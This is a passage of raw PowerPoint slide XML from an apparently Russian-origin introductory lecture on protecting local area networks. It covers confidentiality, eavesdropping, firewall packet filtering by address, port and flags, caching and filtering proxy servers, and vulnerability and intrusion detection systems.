            <a:ext cx="6781320" cy="2133360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="b">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4800" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Local Area Networks Protection</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="4800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="849240" y="3049560"/>
            <a:ext cx="6248160" cy="2361960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="799"/>
              </a:spcBef>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200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>about ???</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="32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9F38257B-5659-4B4C-BAF4-80AC03360FC0}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 4" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2214720" y="2786040"/>
            <a:ext cx="4762080" cy="355248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Firewalls</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2"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5E5F501B-39B9-46CC-8579-8486E592475D}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 3" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9360" y="2143080"/>
            <a:ext cx="8996040" cy="421452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i="0" u="none" strike="noStrike" cap="none" spc="0">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Confidentiality</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8457840" cy="4876560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>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i="0" u="sng" strike="noStrike" cap="none" spc="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Confidentiality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> – only the sender and recipient should know the contents of the message</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4396FB70-2AD3-416C-8E61-11524A92207A}" type="slidenum">
              <a:rPr lang="en-US" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CustomShape 4" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3049560" y="4510080"/>
            <a:ext cx="2666519" cy="1523520"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -6787"/>
              <a:gd name="adj2" fmla="val 14898"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCC00"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ct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1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>network</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 5" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1571759" y="4662360"/>
            <a:ext cx="715680" cy="990360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 6" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6524640" y="4662360"/>
            <a:ext cx="715680" cy="990360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Line 5" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2439720" y="5271840"/>
            <a:ext cx="3733920" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28440" cap="sq">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
            <a:headEnd type="stealth" w="lg" len="lg"/>
            <a:tailEnd type="stealth" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 8" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4187880" y="3214800"/>
            <a:ext cx="690120" cy="952200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="CustomShape 6" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3201840" y="4281480"/>
            <a:ext cx="990360" cy="990360"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="624" h="624" fill="norm" stroke="1" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="624"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="66" y="601"/>
                  <a:pt x="293" y="587"/>
                  <a:pt x="397" y="483"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="501" y="379"/>
                  <a:pt x="577" y="101"/>
                  <a:pt x="624" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28440" cap="sq">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:tailEnd type="stealth" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="CustomShape 7" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5141160" y="3290760"/>
            <a:ext cx="1943384" cy="825156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="90000" tIns="46800" rIns="90000" bIns="46800">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="8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2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Eavesdropping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="8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2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>packet capture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="8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2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>copying</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="20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Firewalls</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1428840"/>
            <a:ext cx="8229240" cy="5071680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="394383" indent="-394023">
              <a:lnSpc>
                <a:spcPct val="10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Firewalls are set up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>on the gateway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> connecting the local network and the Internet</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="10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400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>all traffic passes through the firewall</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="394383" indent="-394023">
              <a:lnSpc>
                <a:spcPct val="10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Analyze packets:</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="10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400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>network layer header (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>IP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>addresses)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="10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en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> UDP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>header (port numbers)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="10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400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>flags </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> (for example, deny the connection)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="394383" indent="-394023">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="330066"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="v"/>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Work according to a set of rules, for example</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="669999"/>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400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>prohibit all incoming connections except on port 80</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="24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Proxy servers</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8229240" cy="4411440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="330066"/>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Browsers forward all requests to the proxy server</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="330066"/>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It searches for the page in the cache and, if it doesn't find it, sends a request to the remote web server</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="330066"/>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Clients don't connect to the Internet directly</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="330066"/>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A proxy server can filter traffic (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>vkontakte.ru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-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Vulnerability and intrusion detection systems</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1500120"/>
            <a:ext cx="8229240" cy="5000400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2401"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="330066"/>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Find vulnerabilities of computers on the network</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2401"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="330066"/>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Check the system configuration for resistance to known attacks</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2401"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="330066"/>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Check the network settings of the OS</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="80000"/>
